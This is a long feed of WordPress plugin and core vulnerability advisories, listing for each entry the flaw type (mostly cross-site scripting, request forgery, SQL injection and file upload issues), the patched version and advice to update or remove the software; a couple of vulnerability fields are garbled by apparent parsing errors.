Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Arbitrary Booking Update and Sensitive Data Exposure
Patched Version: 1.0.49
Recommended Action: Update to version 1.0.49, or a newer patched version

Plugin: VS Contact Form

Vulnerability: Captcha Bypass
Patched Version: 11.6
Recommended Action: Update to version 11.6, or a newer patched version

Plugin: Update Image Tag Alt Attribute

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: CSV Injection
Patched Version: 1.3.35
Recommended Action: Update to version 1.3.35, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated SendWP Plugin Installation and Client Secret Key Disclosure
Patched Version: 3.4.34
Recommended Action: Update to version 3.4.34, or a newer patched version

Plugin: XEN Carousel

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Users

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.8.3
Recommended Action: Update to version 4.8.3, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Missing Authorization via formcraft_nag_update
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Portfolio Gallery – Image Gallery Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Twimp WP

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loan Comparison

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP fancybox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Follow Me Plugin

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visual CSS Style Editor

Vulnerability: Reflected Cross-Site Scripting via wyp_page_type parameter
Patched Version: 7.5.4
Recommended Action: Update to version 7.5.4, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Arbitrary File Upload
Patched Version: 7.0.2
Recommended Action: Update to version 7.0.2, or a newer patched version

Plugin: JetBlocks for Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8.1
Recommended Action: Update to version 1.3.8.1, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_save_state
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WP Accessibility Helper (WAH)

Vulnerability: Reflected Cross-Site Scripting via wahi
Patched Version: 0.6.0.7
Recommended Action: Update to version 0.6.0.7, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.10
Recommended Action: Update to version 2.5.10, or a newer patched version

Plugin: Accessibility

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Team Circle Image Slider With Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.18
Recommended Action: Update to version 1.0.18, or a newer patched version

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: Google Maps made Simple

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Steveas WP Live Chat Shoutbox

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘uucss_update_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Perfect Survey

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Create Block Theme

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Offload SES Lite

Vulnerability: Interpretation Conflict
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Store Toolkit – WooCommerce Extensions, Quick Enhancements & Handy Tools

Vulnerability: Missing Authorization
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Opal Estate

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Powerplay Gallery

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.11.3.4
Recommended Action: Update to version 4.11.3.4, or a newer patched version

Plugin: Extra Block Design, Style, CSS for ANY Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.2.7
Recommended Action: Update to version 0.2.7, or a newer patched version

Plugin: Parsian Bank Gateway for Woocommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.22.3
Recommended Action: Update to version 1.22.3, or a newer patched version

Plugin: AmpedSense – AdSense Split Tester

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Feedweb

Vulnerability: Missing Authorization
Patched Version: 3.0.11
Recommended Action: Update to version 3.0.11, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via plupload.flash.swf
Patched Version: 3.7.14
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.14, 3.8.14, 3.9.12, 4.0.11, 4.1.11, 4.2.8, 4.3.4, 4.4.3, 4.5.2

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 2.9.7
Recommended Action: Update to version 2.9.7, or a newer patched version

Plugin: Affiliate Power – Sales Tracking for Affiliate Marketers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Content Mask

Vulnerability: Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 1.8.4.1
Recommended Action: Update to version 1.8.4.1, or a newer patched version

Plugin: ConvertPlus

Vulnerability: Unauthenticated Administrator Creation
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Stream

Vulnerability: Admin+ SQL Injection
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Radio Buttons for Taxonomies

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WordPress Book Plugin for Displaying Books in Grid, Flip, Slider, Popup Layout and more

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Portfolio Slideshow

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: Custom Post Type and Taxonomy GUI Manager

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visual Composer Website Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via ‘Title’
Patched Version: 45.0.1
Recommended Action: Update to version 45.0.1, or a newer patched version

Plugin: Accordion

Vulnerability: Unprotected AJAX Action to Stored/Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: PICA Photo Gallery

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Embed Privacy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.5a
Recommended Action: Update to version 1.2.5a, or a newer patched version

Plugin: WordPress Simple HTML Sitemap

Vulnerability: Reflected Cross-Site Scripting via id
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 2Way VideoCalls and Random Chat – HTML5 Webcam Videochat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.8
Recommended Action: Update to version 5.2.8, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.7
Recommended Action: Update to version 5.7, or a newer patched version

Plugin: Accept Stripe Donation and Payments – AidWP

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Unspecified Vulnerability (affects Broadcast Live Video <= 5.5.15)
Patched Version: 5.5.16
Recommended Action: Update to version 5.5.16, or a newer patched version

Plugin: Essential Real Estate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Web Invoice – Invoicing and billing for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form, Survey, Quiz & Popup Form Builder – ARForms

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Invitation Based Registrations

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery via handleSubmitAction function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Grou Random Image Widget

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Profile & Dashboard fields [Modify/Disable/Remove]

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: WooCommerce Anti-Fraud

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Image News Slider

Vulnerability: Unspecified Vulnerability
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Happy Addons for Elementor

Vulnerability: Cross-Site Request Forgery via handle_optin_optout()
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Newsletter Popup

Vulnerability: Cross-Site Request Forgery to Record Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import and export users and customers

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.19.2.1
Recommended Action: Update to version 1.19.2.1, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.83
Recommended Action: Update to version 3.83, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated Arbitrary File Read
Patched Version: 0.9.71
Recommended Action: Update to version 0.9.71, or a newer patched version

Plugin: WooCommerce EAN Payment Gateway

Vulnerability: Missing Authorization to Authenticated (Contributor+) EAN Update
Patched Version: 6.1.0
Recommended Action: Update to version 6.1.0, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: SQL Injection
Patched Version: 2.05.03
Recommended Action: Update to version 2.05.03, or a newer patched version

Core: WordPress

Vulnerability: Improper Authorization to Information Disclosure
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_add_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Media Library Categories

Vulnerability: Multiple Unauthenticated Cross-Site Scripting Issues
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Automated Editor

Vulnerability: Cross-Site Request Forgery via admin menu pages
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Original Media Path

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: User Role by BestWebSoft – Add and Customize Roles and Capabilities in WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Wp Cookie Choice

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: which template file

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.9.0
Recommended Action: Update to version 4.9.0, or a newer patched version

Plugin: Easy Newsletter Signups

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Batch Cat

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iPages Flipbook For WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.4
Recommended Action: Update to version 1.15.4, or a newer patched version

Plugin: 胖鼠采集(Fat Rat Collect) 微信知乎简书腾讯新闻列表分页采集, 还有自动采集、自动发布、自动标签、等多项功能。开源插件

Vulnerability: Missing Authorization
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Popup Box (Developer) – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: 7.9.0) and Developer (20.0.0
Patched Version: 20.9.0
Recommended Action: Update to version 20.9.0, or a newer patched version

Plugin: Conditional shipping & Advanced Flat rate shipping rates / Flexible shipping for WooCommerce shipping

Vulnerability: Cross-Site Request Forgery via enableDisable and deletePost
Patched Version: 1.6.4.6
Recommended Action: Update to version 1.6.4.6, or a newer patched version

Plugin: Advanced Custom Fields: Image Crop Add-on

Vulnerability: Improper Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Read More Excerpt Link

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Beebee Mini

Vulnerability: Unauthorized File Upload via ACF
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Link Library

Vulnerability: Missing Authorization Checks
Patched Version: 7.2.8
Recommended Action: Update to version 7.2.8, or a newer patched version

Plugin: WP FullCalendar

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Force First and Last Name as Display Name

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Authenticated (Subscriber+) Arbitrary Client Deletion (wo_ajax_remove_client)
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Comment Reply Notification

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Open Graph and Twitter Card Tags

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.4.1
Recommended Action: Update to version 2.2.4.1, or a newer patched version

Plugin: WP Background Takeover

Vulnerability: Directory Traversal
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Easy Preloader

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Songbook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Authenticated SQL Injection
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: Shortlink by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Admin Management Xtended

Vulnerability: Cross-Site Request Forgery to Post Status Update
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Shortcode Redirect

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.02
Recommended Action: Update to version 1.0.02, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: WP Symposium

Vulnerability: Cross-Site Scripting
Patched Version: 13.04
Recommended Action: Update to version 13.04, or a newer patched version

Plugin: Mingle Forum

Vulnerability: SQL Injection
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: User Email Verification for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.7.2
Recommended Action: Update to version 3.0.7.2, or a newer patched version

Plugin: Nelio AB Testing

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: SQL Injection
Patched Version: 4.2.23
Recommended Action: Update to version 4.2.23, or a newer patched version

Plugin: HandL UTM Grabber / Tracker

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Simple Membership

Vulnerability: Membership Privilege Escalation
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Voting Record

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tiger Forms – Drag and Drop Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 13.0.6
Recommended Action: Update to version 13.0.6, or a newer patched version

Plugin: History Log by click5

Vulnerability: Authenticated (Administrator+) Time-Based Blind SQL Injection
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: WP-FormAssembly

Vulnerability: Limited Server Side Request Forgery via ‘formassembly’ shortcode
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Easy Newsletter Signups

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: StoryChief

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.31
Recommended Action: Update to version 1.0.31, or a newer patched version

Plugin: Themify – WooCommerce Product Filter

Vulnerability: WooCommerce Product Filter <= 1.3.7
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Sp*tify Play Button for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.06
Recommended Action: Update to version 2.06, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Multiple SQL Injections
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP PDF Generator

Vulnerability: Cross-Site Request Forgery to PDF Settings Update
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Privilege Escalation
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Ripe HD FLV

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: Code Snippets

Vulnerability: Cross-Site Request Forgery via load
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Image horizontal reel scroll slideshow

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 13.4
Recommended Action: Update to version 13.4, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Thanh Toán Quét Mã QR Code Tự Động – MoMo, ViettelPay, VNPay và 40 ngân hàng Việt Nam

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Export any WordPress data to XML/CSV

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Woo MerchantX

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Search in Place

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.0.105
Recommended Action: Update to version 1.0.105, or a newer patched version

Plugin: Oi Yandex.Maps for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smooth Page Scroll Up/Down Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Missing Authorization to Arbitrary File Upload
Patched Version: 3.0.96
Recommended Action: Update to version 3.0.96, or a newer patched version

Plugin: SAHU TikTok Pixel for E-Commerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wp-championship

Vulnerability: SQL Injection
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: WP YouTube Lyte

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.7.16
Recommended Action: Update to version 1.7.16, or a newer patched version

Plugin: Send PDF for Contact Form 7

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: WP Travel – Ultimate Travel Booking System, Tour Management Engine

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: WPS Limit Login

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Page Builder by SiteOrigin

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: 2.10.16
